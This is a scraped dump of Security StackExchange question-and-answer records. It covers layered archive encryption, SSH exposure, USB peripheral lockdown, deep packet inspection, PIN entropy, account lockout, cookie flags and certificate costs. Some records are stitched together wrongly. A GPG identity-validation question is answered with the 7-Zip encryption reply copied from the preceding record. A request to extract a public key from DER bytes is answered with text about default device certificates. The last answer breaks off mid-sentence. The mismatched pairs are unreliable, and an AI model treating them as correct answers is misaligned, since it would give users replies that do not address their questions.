"https://security.stackexchange.com",
"https://security.stackexchange.com/users/12253/"
]
} |
154,800 | Imagine I wish to upload my sensitive personal information (photos, document scans, list of passwords, email backups, credit card information, etc.) on Google Drive (or any other cloud service). I want to make sure this entire bunch of data is as safe as possible (against hackers that would in some way get their hands on this data, and against Google and its employees, and also in the future, i.e. if I delete this data from Google I want to be sure they won't be able to 'open' it even if they keep its backup forever). So in this case instead of uploading all this data right away to the cloud, I will instead make one folder containing all the data I want to upload, and then I will compress this entire folder using 7-Zip and of course password-protect it using 7-Zip. I will do this not once, but a few times, i.e. once I have the 7-Zip password-protected archive ready, I will compress it once again using 7-Zip and use a completely different password. I will do this five times. So in the end my data is compressed five times and it has been password-protected using 7-Zip by five completely different unrelated passwords. So in order to get to my data I have to extract it five times and provide five different passwords. What I will then do is that, I will take this five-times-password-protected archive, and I will compress it once again using 7-Zip and yet a different sixth password, but in addition to that this time I will also choose to split the archive into smaller chunks. Let's say in the end I end up with 10 split archives, where each of them is a 200 MB archive except the 10th one being only a 5 MB archive. The assumption is, all those six passwords are at least 32-character passwords and they are completely unrelated and they all contain lower/upper case, numbers, and symbols. Now I take those nine 200 MB archives and put them in one container and encrypt the container using VeraCrypt (assuming the three level cascade encryption) and then upload this container to my Google Drive. I keep the 10th archive (the 5 MB one) on a completely different service (say on Dropbox -- and that Dropbox account is in no way connected/linked to my Google account at all) (also encrypted by VeraCrypt). - Have I created a security theater ? Or have I really made it impossible for anyone to access and extract my data? After all they have to pass one level of encryption by VeraCrypt and even after that the archives are six times password protected and one of the archives (the tenth one) is stored somewhere else! - If someone gets access to my Google Drive and downloads all those nine archives, is there any way for them to extract the archive without having the last (the tenth) 5 MB archive? Can the data in any way be accessed with one of the split-archives missing? - Even if someone gets their hand on all those 10 archives together and manages to bypass the VeraCrypt encryption in any way, will it be still feasible to break the six remaining passwords? | First of all, that multi-encryption scheme is ridiculous. The algorithm used by 7-Zip is AES-256 which is considered secure. But if someone would find a flaw in it which would make it breakable, then they would likely be able to break all your encryption layers with equal effort. So either you trust the encryption algorithm used by 7-Zip, then one application would be good enough. Or you don't trust it, then you would do another encryption pass with a different algorithm. Layering the same algorithm multiple times often doesn't have as much effect as one would think, as the meet-in-the-middle attack on Triple-DES demonstrated. Regarding splitting up an encrypted file: It is often possible to rescue some data from a 7-Zip archive if parts of the archive are missing. 7-Zip uses AES in CBC mode to emulate stream-cipher behavior (every 128-bit block is combined with the previous 128 bit block). That means if someone is missing a part of the message, they can't decrypt anything which follows (unless they have a known plaintext somewhere), but everything which comes before it. That means if you want to prevent an attacker from decrypting the archive by withholding a part of it, you need to withhold the first chunk, not the last one. | {
"source": [
"https://security.stackexchange.com/questions/154800",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/142930/"
]
} |
154,803 | It's a common need to prove that a file is truly created by someone, and I think GnuPG did the job. However, anyone can generate a gpg key with an unverified email. GPG key servers doesn't verify my email address at all. Is there any CA that provides identity validation like signing a HTTPS Certificate does? | First of all, that multi-encryption scheme is ridiculous. The algorithm used by 7-Zip is AES-256 which is considered secure. But if someone would find a flaw in it which would make it breakable, then they would likely be able to break all your encryption layers with equal effort. So either you trust the encryption algorithm used by 7-Zip, then one application would be good enough. Or you don't trust it, then you would do another encryption pass with a different algorithm. Layering the same algorithm multiple times often doesn't have as much effect as one would think, as the meet-in-the-middle attack on Triple-DES demonstrated. Regarding splitting up an encrypted file: It is often possible to rescue some data from a 7-Zip archive if parts of the archive are missing. 7-Zip uses AES in CBC mode to emulate stream-cipher behavior (every 128-bit block is combined with the previous 128 bit block). That means if someone is missing a part of the message, they can't decrypt anything which follows (unless they have a known plaintext somewhere), but everything which comes before it. That means if you want to prevent an attacker from decrypting the archive by withholding a part of it, you need to withhold the first chunk, not the last one. | {
"source": [
"https://security.stackexchange.com/questions/154803",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/142948/"
]
} |
154,873 | I recently had a conversation with my boss and an IT contractor that they use. My request to allow outside access to a machine on the network via SSH was denied on the grounds that SSH is insecure. I asked for an explanation and unfortunately did not understand it - the contractor stated SSH was insecure but did not know why. Why is SSH insecure? There seems to be something I missed during our conversation that I desperately want to understand. My proposal for SSH included using key-based access and fail2ban. UPDATE: To explain the discussion, as soon as I asked the contractor why he thought SSH was insecure he said, verbatim, "I don't know" and proceeded angrily with an increased tone of voice for the rest of the conversation. I tried to extricate myself but had to fend off some strawmen to avoid looking completely incompetent due to his badgering. I made the arguments that most of the good answers to this question make below and they were promptly ignored. Those same answers are extremely unconvincing if viewed with a skeptic eye. I'm not sure if my (which is the IT contractor's) question sets an unreasonably high burden of proof which can never be met, for either direction. If that is the case it would be wise to speak to that. | SSH is not typically considered insecure in and of itself but it is an administrative protocol and some organizations require two or more layers of control to get access to an administrative console . For example connecting via a VPN first then opening an SSH session which connects through that VPN. This simply provides multiple layers of defense in depth and prevents your systems from being directly affected by the latest SSH vulnerabilities. Note: This is NOT a weakness in SSH itself and many organizations will still expose SSH on high TCP ports for use as SFTP servers then have a script move data to and from that system (not allowing the external SSH/SFTP server to connect to the rest of their network). All protocols eventually have vulnerabilities so if you can require the use of two different ones (i.e. IPSEC VPN and SSH) and stay disciplined about remediation efforts when vulnerabilities are discovered then the window of time where known vulnerabilities exist in both protocols at the same time on your network should be very small. Statistically, the requirement for using two protocols should reduce the amount of time where you would have a single protocol exposed with a known vulnerability (assuming you actually patch/remediate vulnerabilities). As a poor text graphic look the following: Time --->
IPSEC ------------------------ ----------------
SSH --------- ----------------------------- Versus having just SSH, or a VPN, by itself: SSH --------- ----------------------------- In the first example when an SSH vulnerability came out there wasn't one for IPSEC and vice versa so there was never a time, in this crude example, where your systems had vulnerabilities at both layers. This defense in depth is what is protecting the system behind these protocols which occasionally may have vulnerabilities. In the second example, SSH by itself, the moment there is a vulnerability, or a password breach, or any number of other issues, an attacker can directly access your vulnerable system during the window of exposure. I would ask if any other administrative protocols are being exposed and if so then you can question the technology bias but most likely you may be in an organization that doesn't allow any administrative protocols to be accessed directly from the Internet. | {
"source": [
"https://security.stackexchange.com/questions/154873",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
154,889 | I am wondering how big companies manage access to their codebase from their developers. In order to make their code safe do they allow their developers to have access to entire codebase or to only particular subprojects to avoid stealing the entire codebase ? For example, if a company has 10 developers, should they set in place access control policies, so each developer will have access only to particular module he/she needs to develop? If so, please let me know how to achieve this. [Edited]: As expected the code source has been taken from one of the developers and sold it to somebody, it was done by trusted developers for those who says trust is must. | In any sanely managed company, a developer usually gets full access to the sourcecode of any project they work on. The reason is that the benefits of releasing parts of the code on a strict need-to-know basis isn't worth the bureaucratic hassle and the huge work impairment it creates for the developers. Developers can't work without seeing the whole picture. I am a professional software developer who works in a team which maintains a huge system. Most of the problems I get tasked to fix are bugs which could be in any part of the system. I need the full sourcecode in order to figure out where the bug originates and how to fix it. I wouldn't be able to do that job if I would need to fill out a form and wait for management approval before I can look at some of the modules which could have something to do with it. Good software developers don't grow on trees. They are hard to replace and they can easily get a job somewhere else. To get and keep the best talent, you need to treat your developers well. If my company would start to hassle me with unreasonable access restrictions to sourcecode, it would frustrate me because I can't work efficiently and it would insult me because it means they don't trust me. I would be gone in a few weeks. Most code isn't actually that valuable. Most code which gets written in the world is only useful for solving the problem of one specific client. For anyone else, the code is completely worthless. Even if the code is valuable to a larger demographic, you have the law to protect it. Copyright and non-disclosure clauses in work contracts allow you to sue the pants off of anyone who tries to sell your intellectual property to someone else. Technical measures to prevent sourcecode leaks on a network layer (like proposed in the comments to the question) are not an effective solution either. Developers are smart. They solve computer problems for a living. If they really want to get some information out of your building, they will find a way to do it. Not even the NSA was able to prevent Edward Snowden from leaking gigabytes of confidential data. Besides, a malicious developer can do far more harm than just leak your sourcecode. There isn't much you can do about that, because the more you try to monitor and limit your developers, the less efficient they will be and the more unhappy they will become. So what can you do to prevent your developers from turning against you? It's simple: Don't hire developers you can't trust and treat them well so they won't form a grudge against you . That means if you are a manager suffering from paranoia and trust issues, then software development is not the right industry for you (you might want to give retail a chance). | {
"source": [
"https://security.stackexchange.com/questions/154889",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/131039/"
]
} |
154,975 | Some sites I visit take me to a page that says roughly, "Checking your browser before accessing example.com. DDoS attack protection by CloudFlare". What exactly about my browser is being checked and how will that help protect against a DDoS attack? | Most Denial-Of-Service (DOS) attacks rely on some asymmetry between the resources involved on attacker side and on target side. In other words, to be successful, a DOS needs an action to require very few resources client-side (so the each clients can send a lot of requests) while involving larger resources server-side (so the server(s) will be unable to handle the load). Due to this, DDOS attacks (the "Distributed" version of DOS attacks) are obviously not engaged by real humans clicking on links in a browser tab, but by bots sending massive amount of parallel requests to the target. The consequence of this is that the DDOS "client" is not a real browser, but a tool which may more-or-less simulate one. Cloudflare DDOS protection system is quickly described on their website as follow: "an interstitial page is presented to your site’s visitors for 5 seconds while the checks are completed" . Two things trigger my attention here: The checks : the most obvious way to sort real website users from automatic DDOS bots is to check whether the HTTP client is a real browser or not. This can go through testing the client's behavior against a panel of tests (see the post " bot detection via browser fingerprinting " for instance) and compare the result with the one expected from a genuine instance of the browser the client claims to be (for instance if the client claims to be a Firefox version 52 running on a Windows 10 machine, does it present the same characteristics?). 5 seconds : Executing JavaScript tests and redirecting the visitor could be a very fast and almost transparent operation, so I believe that this "5 seconds" timeout is not there by accident but is meant to revert the computational asymmetry back in favor of the server. The most light version of such principle would simply be to ask the client to wait (sleep) 5 seconds before resubmitting the same request (with a unique identifier stored in a cookie, as described on Cloudflare page). This would force the DDOS client to somehow handle a queue of pending redirections, and would finally make the overall DDOS process less effective. A more brutal alternative would be to request the browser to solve some mathematical challenge which would require a few seconds to be solved on an average home system. In such a case, attackers would have no other choice than spend computational power to solve these challenges if they would like to proceed, but doing so will completely void the asymmetry since all the attacker's resource will be busy in solving challenges instead of sending requests, finally "DOSing" the attacker's system instead of the target's one. | {
"source": [
"https://security.stackexchange.com/questions/154975",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
155,057 | I found out that my ISP does deep packet inspection .
Can they see the contents of HTTPS connections? Wouldn't having HTTPS ensure that they can't see the contents being transferred? And can having a VPN protect me against deep
packet inspection by ISPs? | Deep Packet Inspection, also known as complete packet inspection, simply means they are analyzing all of your traffic as opposed to just grabbing connection information such as what IP's you are connecting to, what port number, what protocol and possibly a few other details about the network connection. This is normally discussed in contrast to the gathering of NetFlow information which mainly collects the information listed above. Deep packet inspection gives your provider a lot of information about your connections and habits of Internet usage. In some cases, the full content of things like SMTP e-mails will be captured. HTTPS does encrypt the connections but your browser has to make DNS requests which are sent primarily via UDP so that data will be collected as will any unencrypted links or unencrypted cookies sent incorrectly without https. These additional bits which will be collected may be very telling about what type of content you are looking at. The larger concern for most people is about data aggregation , by collecting this information a data scientist could create a fingerprint for your Internet usage and later associate with past activities or activities from other locations (when you are at work or are on vacation). Likewise, your service provider may choose to sell this to any number of organizations (possibly including criminal organizations) where it could then be used against you in ways. In many countries, people have an expectation that their communications are considered to be private and collecting this data very much goes against that privacy expectation. Another interesting aspect of this is in the cases like the US where this data may soon be sold it allows International communications sent to people, or servers, in the US be sold as well . Likewise, this could potentially allow every agency from local law-enforcement, military, tax authorities, immigration authorities, politicians, etc. a way to bypass long-standing laws which have prevented them from accessing this type of information, or important informational subsets within this data otherwise. A slightly different concern when this data can be sold is competitive intelligence / corporate espionage. In the scenario where a company does a lot of research-intensive work at their headquarters located in some small geographical location (think of pharmaceuticals or a defense contractor) selling that data makes it possible for anyone to buy all of the traffic from the local ISP where most of those researchers live and analyze what they are looking for when at home, possibly even directly from the ISP hosting the traffic for their corporate headquarters. If other countries aren't selling similar data it gives foreign companies and companies wise enough to try and buy this data a huge technical advantage. Likewise, it would also allow foreign governments to buy ISP traffic which includes the data from US (or other government) Officials homes. Imagine companies monitoring their employee's behavior at home or on their mobile devices. This will likely have a chilling effect on activists and whistle-blowers as well. Likewise, if credit cards or PII are sent in the clear to a poorly secured remote site your ISP's data set now has a potential PCI or PII regulatory issue on their hands. So this amplifies data-leakage problems of all types by making additional copies of the data leaked. With the examples I've just mentioned above, and there are hundreds of others, it should be easy to see why this type of data collection has a different level of importance to it than just metadata or basic connection information. Even if your ISP never sells this data they are collecting quite an interesting dataset. It's a security issue that definitely has a lot of potential long-term security implications. | {
"source": [
"https://security.stackexchange.com/questions/155057",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141656/"
]
} |
155,132 | Suppose I have a Windows PC in a safe room, disconnected from the internet, with only 3 cables connecting to another room, to a mouse, monitor and keyboard. The computer contains highly sensitive data. The HDMI monitor cable is no problem, but the mouse and keyboard cables are USB cables, and could be connected to some USB drive. I am specifically interested here in securing the USB cables. Please disregard other ways of stealing information, like taking photos of the screen etc. My question is: How can I make sure only some specific mouse and keyboard are allowed to be connected to the USB cables? For example, is there some kind of hardware I can put between the USB cable and the computer to make sure only some allowed device is connected to it? Security KVM Switches (Keyboard-Video-Monitor switches) are not good because in practice all of them seem to introduce some small delay (lag, or latency) when moving the mouse or typing. It really must feel as if you are directly connected (no lag whatsoever). Maybe there are some Arduino, BasicX, Parallax, Pololu, or Raspberry Pi projects out there to filter USB communication and let through only allowed devices, with no lag? I know there is software to do that (e.g.: https://support.symantec.com/en_US/article.TECH175220.html ) but since the user is using the computer he could disable it. | Buy a PS2 to USB adapter for keyboards+mice (important: both need to be in one usb port to make sure it's not a naive straight-through connector). They have logic and cost about $10 USD at time of writing. Then buy USB to PS2 adapters for both mice and keyboard (separate adapters). They have no logic, just internal wiring to each connection and they cost less than $5 USD at time of writing. Put them altogether. Yes, it looks funky, but the devices will still work as-expected. Now, even if one of the user-reachable cables is spliced, they can't add new hardware other than generic mice and keyboards. Nice things about this: cheap simple hardware-implemented protects against unknown devices OS-independent UPDATE:
I manually verified, twice, that there is no continuity between USB's data-/data+ pins and the PS2 data/clk pins (or any other ps2 pins) on a two-in-one adapter. There is continuity on single-port adapters though, but that's not important as long as one of the adapters implements some kind of logic like the two-in-one does. Plugging in the empty adapter to a windows box should cause the "USB insertion ding"; otherwise it's a naive physical adapter. The dual PS2-USB adapter I specifically tested was an "ez-pu21", available still on amazon. UPDATE #2, 2 things: there are usb keyboard attacks, so you need to lock down the OS properly to maintain security. one can get inside bios with a keyboard, and i'm not sure how risky that is to exfiltration, or if all they can do is "break" the computer. UPDATE#3:
After using the double-inline adapters for about 24 hours, I can say they work, but not quite 100%, maybe 99%. When I was doing serious programming (typing) I noticed that keys held down for about 1/3rd of a second repeat. This is before my typematic repeat about 2/3rds a second after press, and it only repeats once; leading to stuff like "biig" instead of "big". I only noticed it a few times, late at night, but I wanted to mention it. I didn't even notice it until after hours of use, but if you were writing a novel, it might be frustrating. It could just be the cheap adapter i used, the really long cables i'm using or something else nobody will experience. BONUS: (related but OT): I just realized these cheap usb switches don't connect the data pins, they are too cheap to switch all 4 wires, thus making a cheap "USB condom" for those who desire such a thing, thought i'd share. cheap condoms, how can you go wrong? | {
"source": [
"https://security.stackexchange.com/questions/155132",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/83482/"
]
} |
155,403 | We are developing a product (device / system) that will be installed on customer sites. Many of our customers will (should) be concerned about security, and should be thinking about it seriously. Our product provides an API via HTTPS, which is used by the built-in UI and is also open for use by customers. I'm looking for information and advice on how to deal with the SSL certificates that are installed in our product when they leave the factory. I would appreciate any input - have we overlooked or missed anything? As It Stands Today Currently (the system is in development) we are installing the same self-signed certificate into every development and prototype unit. This clearly has no chain of trust and the user will see a warning. I believe that this is the same approach taken by other manufacturers (e.g: Cisco, Ubiquiti), but confirmation would be appreciated. Options Customers will be able to provide their own certificates , signed in whatever manner they wish (publicly, or privately). This will give them the chain of trust, and will allow them to be sure that they really are connecting to *that* system. Installing a different self-signed certificate on each unit . I'm not sure there is any benefit to doing this over sharing a single self-signed certificate across all units, as the certificate is still untrusted. Installing a publicly signed certificate on each unit that leaves the factory. As far as I can tell, this will not work . Certificates are tied to a FQDN (possibly with a wildcard), and as such there is no way for us to generate and sign a certificate for the customer. | We are installing the same self-signed certificate into every development and prototype unit. Installing the same certificate into every unit is about the worst security practice one could imagine when dealing with certificates. We now know not to release products with the default hard coded administrative credentials. We avoid default credentials because such credentials could be extracted once and used to compromise all devices that implement them. This is a very similar situation – the default certificate means the private key could be extracted once and used to compromise all devices that rely on this certificate. Cryptographically, both self-signed and trusted third party certificates operate the same way. Each certificate is associated with a key pair consisting of a secret private key and a non-secret public key. If you know the private key, then you can perform every action associated with the public key and certificate. The compromise of the default certificates has further implications than just compromising authentication. For TLS, depending on the cipher used, the certificate could end up being used to establish a shared secret. In such cases, a passive eavesdropper would be able to decrypt TLS traffic after seeing the initial handshake. Sure, competent administrators will fix this issue by uploading their own unique certificates, but how many would actually stop at 'just make it work' stage by trusting the default certificate?
What you should do instead is generate a new key pair on initial boot or factory reset. This is how secure network devices operate. When generating new certificate, you also have to make sure that you have sufficient entropy available in the system and do not end up generating factorable keys. | {
"source": [
"https://security.stackexchange.com/questions/155403",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141974/"
]
} |
155,407 | I have the following bytes array storing a certificate chain (DER encoded): 3082020B3081F4A003020102020500A95AEE5F300D06092A864886F70D01010B0500301C311A301806035504031311544C532050726F6F6620526F6F74204341301E170D3137303331363131333435315A170D3137303631363131333435315A303E310B300906035504061302434831123010060355040A1309544C532050726F6F66311B301906035504031312746C7370726F6F667365727665722E636F6D3059301306072A8648CE3D020106082A8648CE3D030107034200048734740464EBB11EE51C58F19DD761521BC954D291165F6E51E829DB61A3678189FD1AB5F624647F5DFC4F3B60CE3FF78566A53D392417CADEE47FE39EA88C75300D06092A864886F70D01010B050003820101006764246DDECF8CCB50794AC25D19FF3A9242380518FC73A9281B8057AE038F1572E0ADC10A8D7CABCAF339CE484F8EA41423A8933A92E080E2EE07FE06173D2262092D0EE953F8340AE224FB9E16342249EBCE2FE657C99F4D1CD6CD5981DCA5FE46D992053F38384CF92FC5FCD5354829C3A78D2666E0E2FB46FED7BFC9F19C9C633620A77F30F7BFED5A4E853E7F14B87481D41E24D3D9ABFFB5F6E57698A591889396A95B7329E40FE06448EDF07995D3DFF74C4B8EA89AF1FE3CF707DC0E100BE0107A70BCF94AFF350B1314F3F2E320256BBAB3EB7495161983FEEF5D55CE2C981C589F02333990D3B9E913A88F5000ED65109E40D73F43D75F13A31CE6 What is the public key and is the offset to read it constant? | We are installing the same self-signed certificate into every development and prototype unit. Installing the same certificate into every unit is about the worst security practice one could imagine when dealing with certificates. We now know not to release products with the default hard coded administrative credentials. We avoid default credentials because such credentials could be extracted once and used to compromise all devices that implement them. This is a very similar situation – the default certificate means the private key could be extracted once and used to compromise all devices that rely on this certificate. Cryptographically, both self-signed and trusted third party certificates operate the same way. Each certificate is associated with a key pair consisting of a secret private key and a non-secret public key. If you know the private key, then you can perform every action associated with the public key and certificate. The compromise of the default certificates has further implications than just compromising authentication. For TLS, depending on the cipher used, the certificate could end up being used to establish a shared secret. In such cases, a passive eavesdropper would be able to decrypt TLS traffic after seeing the initial handshake. Sure, competent administrators will fix this issue by uploading their own unique certificates, but how many would actually stop at 'just make it work' stage by trusting the default certificate?
What you should do instead is generate a new key pair on initial boot or factory reset. This is how secure network devices operate. When generating new certificate, you also have to make sure that you have sufficient entropy available in the system and do not end up generating factorable keys. | {
"source": [
"https://security.stackexchange.com/questions/155407",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/143590/"
]
} |
155,558 | So I managed to change my password on a service to the "wrong" password, for simplicity let's just say I changed it to an insecure password. Now, I wanted to change it to a more secure password but instead I got a nice error message: The password you entered doesn't meet the minimum security requirements. Which was interesting, considering this new password was using more letters, more numbers and more special characters than the last password. I did some research and found out that the service I am using has a security rule where you have to wait 24 hours before changing the password again. I asked my provider if they could do the change in the accepted answer of that link, but they said they couldn't do it and that the 24 hour wait was "for security reasons". Which leads to my question. How can waiting 24 hours to change the password again be secure? What are the pros/cons of making a user wait before they can change their password again? | By itself, the rule of only allowing one password change per day adds no security. But it often comes in addition to another rule that says that the new password must be different from the n (generally 2 or 3) previous ones. The one change per day rule is an attempt to avoid this trivial perversion: a user has to change his password because it has reached its time limit he changes it to a new password he repeats the change immediately the number of saved passwords minus one he changes it immediately back to the original one => hurrah, still same password which is clearly what the first rule was trying to prevent... Ok, the rule could be the changing the password many times in one single day does not roll the last passwords list. But unfortunately the former is builtin in many systems while the latter is not... Said differently, it is just one attempt to force non cooperative users to change their password on a timely manner. Just a trivial probabilistic analysis after comments saying that allowing users to never change their password is not a security problem. Say you have a rather serious user and that the risk for his password to be compromised in one day is 1%. Assuming about 20 work days a month, the risk of being compromised in a quarter is of about 50% (1-(1- 1/100)^60)). And after one year (200 work days) we reach 87%! Ok, 1% may be high, and just start at 0.1% per day, only one on 1000, pretty negligible isn't it? But after 1 year (200 work days) the risk of begin compromised is almost 20% (18% to be honest). If it is the password for holidays photos I would not care, but for something more important it does matter. It means that what is essential is to educate users and have them accept the rules because we all know that rules can easily be by-passed, and that if a user does not agree with them it will not be cooperative. But asking users to regularly change their password is a basic security rule, because passwords can be compromised without the user noticing that, and the only mitigation way is to change the (likely compromised) password. | {
"source": [
"https://security.stackexchange.com/questions/155558",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/109012/"
]
} |
155,572 | I'm learning about buffer overflows, and I get the idea of fat pointer, but what I don't quite get is how are they a good protection? If you were able to modify the pointer so it points to another address, wouldn't you be able to modify the obj base and obj end section of the fat pointer so that the pointer still seems valid? | Buffer overflows aren't about setting the pointer to point to another arbitrary address. A buffer overflow happens when an input causes your program to performs a seemingly-correct operation ( e.g. " increment() : move the pointer forward 256 bytes" ) too many times, so that the pointer moves out of the intended data structure / array, and into another object. A "fat pointer" contains information about the data structure / array size.
This means increment() can have safety checks in its code, to make sure the pointer is within the appropriate bounds. You still need safety checks somewhere in your code, but this lets you centralise it. | {
"source": [
"https://security.stackexchange.com/questions/155572",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/140429/"
]
} |
155,606 | Imagine a typical 4-digit PIN scheme containing the digits [0-9] . If I choose my PIN at random, I will get one out of 10 * 10 * 10 * 10 = 10,000 codes. Based on my own experience, more than half of the time a random sequence of four digits will contain some property or pattern that significantly lowers its entropy: single digit used in more than one position, ascending/descending pattern, etc. (Yes, yes, a 4-digit PIN only has something like 13 bits of entropy max to begin with, but some random codes are even more awful .) If I were abide by a rule where I only use a PIN that has a unique digit in each position, I believe the number of codes available to me becomes 10 * 9 * 8 * 7 = 5,040 (somebody please correct me if I got that wrong). I have almost halved my key space, but I have also eliminated many of the lower-entropy codes from consideration. At the end of the day, did I help or hurt myself by doing that? EDIT: Wow, lots of great responses in here. As a point of clarification, I was originally thinking less in terms of an ATM/bank PIN (which likely has an aggressive lockout policy after a number of incorrect guesses) and more in terms of other "unsupervised" PIN-coded devices: programmable door locks, alarm system panels, garage door keypads, etc. | The thing is, with a 4 digit pin, entropy isn't really important. What's important it the lockout and the psychology of the attacker. The keyspace is so small that any automated attack (without lockout) would exhaust it almost instantly. What you're worried about is an attacker guessing the pin before the account locks. So assuming a sane lockout (say 3-5 incorrect attempts), you want your PIN to be outside the 3-5 most likely to be chosen PINs. Personally I'd avoid any 4 digit repeating sequence and anything starting 19XX which would be a year of birth. Now smart alecs will say "ahh but if you do that the attackers will know not to try those", but that only applies if a) the majority of the user population follow that advice (hint, they probably won't) and b) the attackers know that the user population has followed that advice. Some great analysis of this (link courtesy of @codesincahaos) Edit 2 - For a far more mathematical take on this I'd recommend reading @diagprov's answer | {
"source": [
"https://security.stackexchange.com/questions/155606",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/36812/"
]
} |
155,754 | Some websites lock out a user after a series of incorrect password attempts for example for 15 minutes. If a malicious actor knows this, can they deliberately try logging in with incorrect passwords every 15 minutes to prevent the real person from logging in? Is this a real threat and if so how can websites protect against it? | Login brute-force protection can be enforced in three ways: Temporary Lockout Permanent Lockout CAPTCHA In my perspective, CAPTCHA is the most reasonable solution to avoid the risk of bruteforce as well as denial of service due to account lockout. You might have seen a CAPTCHA appearing on the login pages of Facebook and Gmail in case you enter wrong password more than three or four times. That's a decent way of restricting bots from bruteforcing and at the same time avoiding locking users out. Permanent lockout is not a novel solution, and it adds a lot of operational overhead to customer support team if they have to manually unlock the account for the user. Temporary lockout on the other hand deter bruteforcing, but like the scenario you mentioned, it can lock out a genuine user. | {
"source": [
"https://security.stackexchange.com/questions/155754",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/142970/"
]
} |
155,925 | We have an intranet system we use to book, track and process invoices for our core business. My boss would like to move this system to the Internet to make it "accessible everywhere". However, I feel this is not wise. Are there some reasons that connecting internal systems directly to the Internet is a bad thing? The system does have its own user and authentication system and was developed in-house by some gifted coders. It has also been penetration tested, but this was all done on the basis that the system was only accessible from the internal domain. | First, it might be best to fully understand the client (your boss's) needs. It's possible he or she only needs access to one small subset of the data on this server from anywhere and not necessarily all of it. Where possible, instead of saying no in this situation come back with a few options. VPN so people travelling, can access the data wherever they are at. If possible add additional security controls like internal firewalls and Data Loss Prevention (DLP) if needed. Harden and add additional security controls here as necessary. Strong authentication and encryption to a separate server which contains a small subset of the data but possibly not all of the sensitive data. Harden and add additional controls here as necessary. Only allowing the server with the sensitive data to push data to the one that can be accessed publically and blocking all packets from the publically accessible server going back to the one containing the sensitive data can be a helpful trick (one-way firewall rule). Create a secure front-end server which can be accessed from anywhere and has controlled access to the backend server. Harden and add additional controls here as necessary. Harden the server itself and if applicable deploy a WAF, or other controls, in front of it. Think of other creative solutions depending on your boss's actual needs (your question isn't specific about the actual needs). No matter which option is chosen make sure you log and monitor access to the system. It would be wise to follow up with your boss after the system starts getting connections from other countries (or at least IP's that are obviously not from people who work with you) and show him or her the global connections to the system. Sometimes this real-world feedback is required for people to understand that the risk. Use this as a chance to educate your boss but do so in a very humble manner sticking strictly to real data, he may have had too many people selling security to him with Fear, Uncertainty, and Doubt (FUD) and may simply not listen to anything that sounds similar regardless of how legitimate this information is. Beware of FUD fatigue. If he or she has reached their limit anything you say in this respect will have the opposite effect you want. When this occurs your best solution is delivering factual data and allowing him or her to come to their own conclusions. Be a problem solver here, provide your boss with solutions, rather than simply with reasons to say no. Don't be afraid to propose expensive solutions that you think are too expensive for the company, your boss may be ok if it moves functionality forward quickly for him or her. That said when possible, always keep security as inexpensive as possible long-term (avoid recurring costs that may get cut during an economic hardship). View this as an opportunity for you to get more security in place by enabling the business rather than fighting it. If you show that you can empower the business and frame needs in terms of what moves the business forward or how things could affect the business you'll get much better response from people like your CEO. Understanding when the business is in a rush is important too, it's not uncommon for a company to pay more money for a solution or approve things which they might not otherwise approve if it can add value and be deployed quickly. To this end, knowing when to time requests and understanding the urgency of the projects in flight will also help you. Think of this part of business as a martial art, you want to leverage your opponents energy and redirect it to a place you want them to go while minimising your own energy expenditure. If you can quickly grab his or her desire to have this accessible, now might be a great time to get a lot more security in place. Speed is important here and you need to get buy-in while it's hot so to speak. Finally, recognize that you will be much better off addressing this as a business problem that you can help with, rather than just a technical security problem. Likewise, start looking for and anticipating additional security needs going forward and bring them to your boss early on so you look like someone helping the company rather than as a roadblock to progress. This bit of framing accomplishes the same objective but gets security in faster and with less conflict. Addition after original post: One thing that may also be helpful for you is to create a long-term security roadmap and share that with your organization. What this entails will be different for every organization but it's very important to show the work you are not currently doing and also work that may be things your organization will never do internally (small start-ups are less likely to have forensic teams in-house). The reason for this is to help educate and also to help set expectations with your leadership team. This is something many security teams have in their head but formalizing a plan and showing a path forward can help you get more buy-in for your security program. A large part of this is about communication and having a shared vision business-wise but another part of this is about educating senior management about where they are risk-wise. I find that visualizing your organizations security-debt helps people automatically make more thoughtful decisions. | {
"source": [
"https://security.stackexchange.com/questions/155925",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/144215/"
]
} |
157,133 | I understand that cookies with the secure flag should be transmitted over a HTTPS connection. It also means that these cookies should be protected from adversaries (private cookie). Thus, it is important to set the HttpOnly flag on this kind of private cookie to prevent XSS. Is a private cookie with the secure flag but no HttpOnly flag a problem? Essentially, I think the HttpOnly flag should be added to a cookie with the secure flag. | The secure flag ensures that the setting and transmitting of a cookie is only done in a secure manner (i.e. https). If there is an option for http, secure flag should prevent transmission of that cookie. Therefore, a missing secure flag becomes an issue if there is an option to use or fall back to http. httpOnly ensures that scripting languages (ie. javascript) won't be able to get the cookie value (such as through document.cookie). The only way to get it is through http request and response headers. Therefore, a missing httpOnly coupled with XSS vulnerability is a recipe for stolen session token. It's best to put httpOnly and secure flag for your session token. Other cookies, it would depend on how sensitive it is and what is it used for. | {
"source": [
"https://security.stackexchange.com/questions/157133",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/123434/"
]
} |
157,175 | I understand SSL certificates cost money because of reputation: most/all web browsers have a limited list of companies that demonstrated they are trusted sources of SSL certificates and therefore don't present users with a Back To Safety! screen for those companies' products. My question is why is this not a one-time expense? I am considering moving from a self-signed cert, but my web host just told me it would be starting at $35 per year , and they can easily go up to hundreds per year. Why isn't this a one-time fee? | Let's start with the cynical view: Certificate Authorities are for-profit companies, so they will charge as much as they are able to get away with! More seriously, running a certificate authority is an expensive, low profit margin business, but the answer really comes down to the type of certificate you want. Domain-Validated (DV) Certificates For a basic DV cert which, makes your browser address bar look like this: the costs are very low - basically the CA just needs to confirm that the person requesting the cert had control of the server at the time of request. This can be fully automated. As @SteffenUllrich points out, in 2014 the Electronic Frontier Foundation, Mozilla, and the University of Michigan teamed up to set up a 100% free CA Let's Encrypt for issueing DV certs. Based on the use-case you described in the question, it sounds like that would suit your needs. Extended Validation (EV) Certificates If you want the high-end certs that include your verified company name and 